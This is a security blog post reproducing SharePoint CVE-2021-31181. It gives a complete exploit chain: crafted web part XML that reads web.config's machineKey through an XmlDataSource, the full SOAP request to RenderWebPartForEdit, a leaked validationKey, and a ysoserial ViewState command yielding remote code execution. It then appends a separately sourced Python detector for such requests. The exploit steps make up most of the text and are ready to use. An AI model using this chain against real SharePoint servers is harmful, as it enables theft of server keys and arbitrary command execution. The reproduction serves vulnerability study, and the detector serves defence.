Reproducing SharePoint CVE-2021-31181

Category: Security Articles

Reproduction

A user account is required; I used a domain administrator account with SharePoint 2016.

First a team site has to be created; in SP2016 this means creating a site collection. I created a site collection named ts:

http://sharepoint:8080/_admin/createsite.aspx


Now look at the XML in the PoC:

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%>
<WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="Documents" WebId="{6e7040c8-0338-4448-914d-a7061e0fc347}">
  <DataSources>
    <att:xmldatasource runat="server" id="XDS1"
      XPath="/configuration/system.web/machineKey"
      datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />
  </DataSources>
  <xsl>
    <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
      <xsl:output method="xml" indent="yes"/>
      <xsl:template match="/">
        <xsl:copy-of select="."/>
      </xsl:template>
    </xsl:stylesheet>
  </xsl>
</WebPartPages:XsltListFormWebPart>

Three parameters are needed:

1. ListDisplayName
2. WebId
3. datafile

WebId comes from http://sharepoint/sites/ts/_api/web/id


e89c64e5-75ce-4bd4-8181-2298228fc91f

For ListDisplayName you can simply create a new list.


So ListDisplayName is test.

The third parameter, datafile, is the web.config file to be read. In c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config the 80 is the web application's port number, but in some special cases you can try C:\inetpub\wwwroot\web.config.

For example, on the SharePoint farm I set up, the 8080 administration port corresponds to 38040.


Then, to read web.config, the constructed XML is:

<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%>
<WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}">
  <DataSources>
    <att:xmldatasource runat="server" id="XDS1"
      XPath="/configuration/system.web/machineKey"
      datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />
  </DataSources>
  <xsl>
    <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
      <xsl:output method="xml" indent="yes"/>
      <xsl:template match="/">
        <xsl:copy-of select="."/>
      </xsl:template>
    </xsl:stylesheet>
  </xsl>
</WebPartPages:XsltListFormWebPart>

The HTTP request (the web part markup inside webPartXml is sent HTML-encoded):

POST /sites/ts/_vti_bin/WebPartPages.asmx HTTP/1.1
Host: sharepoint
Content-Type: text/xml; charset=utf-8
Content-Length: 6527
SOAPAction: "http://microsoft.com/sharepoint/webpartpages/RenderWebPartForEdit"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <RenderWebPartForEdit xmlns="http://microsoft.com/sharepoint/webpartpages">
      <webPartXml>
        <%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
        <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%>
        <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}">
          <DataSources>
            <att:xmldatasource runat="server" id="XDS1" XPath="/configuration/system.web/machineKey" datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />
          </DataSources>
          <xsl>
            <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
              <xsl:output method="xml" indent="yes"/>
              <xsl:template match="/">
                <xsl:copy-of select="."/>
              </xsl:template>
            </xsl:stylesheet>
          </xsl>
        </WebPartPages:XsltListFormWebPart>
      </webPartXml>
    </RenderWebPartForEdit>
  </soap:Body>
</soap:Envelope>

That yields the validationKey E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316

Then build the ViewState with ysoserial. View the page source of http://sharepoint/sites/ts/_layouts/15/success.aspx to get the __VIEWSTATEGENERATOR value AF878507.


Command:

.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd.exe /c calc" --generator="AF878507" --validationkey="E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316" --validationalg="HMACSHA256" --islegacy --minify

Send the request and you get RCE.

However, on my side c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config did not work, while c:/inetpub/wwwroot/web.config did.
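As an added defensive example (not code from the original post): a Python check that a WAF, reverse proxy or SOC pipeline could run over the body of each RenderWebPartForEdit call, flagging the pattern shown above, namely an XmlDataSource whose datafile points at a local path and whose XPath selects machineKey. The sample bodies are constructed here, and the parser falls back to a regex when the web part markup was pasted raw rather than entity-encoded.

```python
import html
import re
import xml.etree.ElementTree as ET

WPP_NS = "http://microsoft.com/sharepoint/webpartpages"
WEBPART_RE = re.compile(r"<webPartXml>(.*?)</webPartXml>", re.S | re.I)
DATAFILE_RE = re.compile(r'datafile\s*=\s*"([^"]*)"', re.I)
XPATH_RE = re.compile(r'xpath\s*=\s*"([^"]*)"', re.I)
LOCAL_PATH_RE = re.compile(r"^(?:[a-z]:[\\/]|\\\\|/)", re.I)  # drive, UNC or absolute path

def extract_webpart_xml(body):
    """Return the decoded <webPartXml> text of a RenderWebPartForEdit call, or None."""
    try:
        root = ET.fromstring(body)
        node = root.find(f".//{{{WPP_NS}}}RenderWebPartForEdit/{{{WPP_NS}}}webPartXml")
        text = None if node is None else node.text
    except ET.ParseError:
        # Not well-formed (markup pasted raw instead of entity-encoded): fall back to regex
        m = WEBPART_RE.search(body)
        text = m.group(1) if m else None
    # ET already decodes &lt; etc.; unescaping again also handles double-encoded payloads
    return None if text is None else html.unescape(text)

def inspect_request(body):
    """Return a list of findings for one SOAP body; empty means nothing suspicious."""
    findings = []
    markup = extract_webpart_xml(body)
    if markup is None or "xmldatasource" not in markup.lower():
        return findings
    for path in DATAFILE_RE.findall(markup):
        if LOCAL_PATH_RE.match(path):
            findings.append(f"XmlDataSource reads local file: {path}")
        if path.lower().endswith("web.config"):
            findings.append("XmlDataSource targets web.config (machineKey exposure)")
    for xp in XPATH_RE.findall(markup):
        if "machinekey" in xp.lower():
            findings.append(f"XPath selects machineKey: {xp}")
    return findings

# Constructed sample shaped like the post's request, web part markup entity-encoded
MALICIOUS = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>
<RenderWebPartForEdit xmlns="http://microsoft.com/sharepoint/webpartpages"><webPartXml>
&lt;WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test"&gt;
&lt;DataSources&gt;&lt;att:xmldatasource runat="server" id="XDS1"
XPath="/configuration/system.web/machineKey" datafile="c:/inetpub/wwwroot/web.config" /&gt;
&lt;/DataSources&gt;&lt;/WebPartPages:XsltListFormWebPart&gt;</webPartXml>
</RenderWebPartForEdit></soap:Body></soap:Envelope>"""
# Constructed benign sample: a content editor web part with no data source
BENIGN = MALICIOUS.split("<webPartXml>")[0] + ('<webPartXml>&lt;WebPartPages:ContentEditorWebPart'
    ' runat="server" /&gt;</webPartXml></RenderWebPartForEdit></soap:Body></soap:Envelope>')
```

Because the leaked validationKey is what lets a forged ViewState pass MAC validation, a confirmed read of web.config means rotating the farm's machineKey as well as patching.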


References

https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability




This article was first published on the WeChat official account ChaBug as "SharePoint CVE-2021-31181 复现" (Reproducing SharePoint CVE-2021-31181).
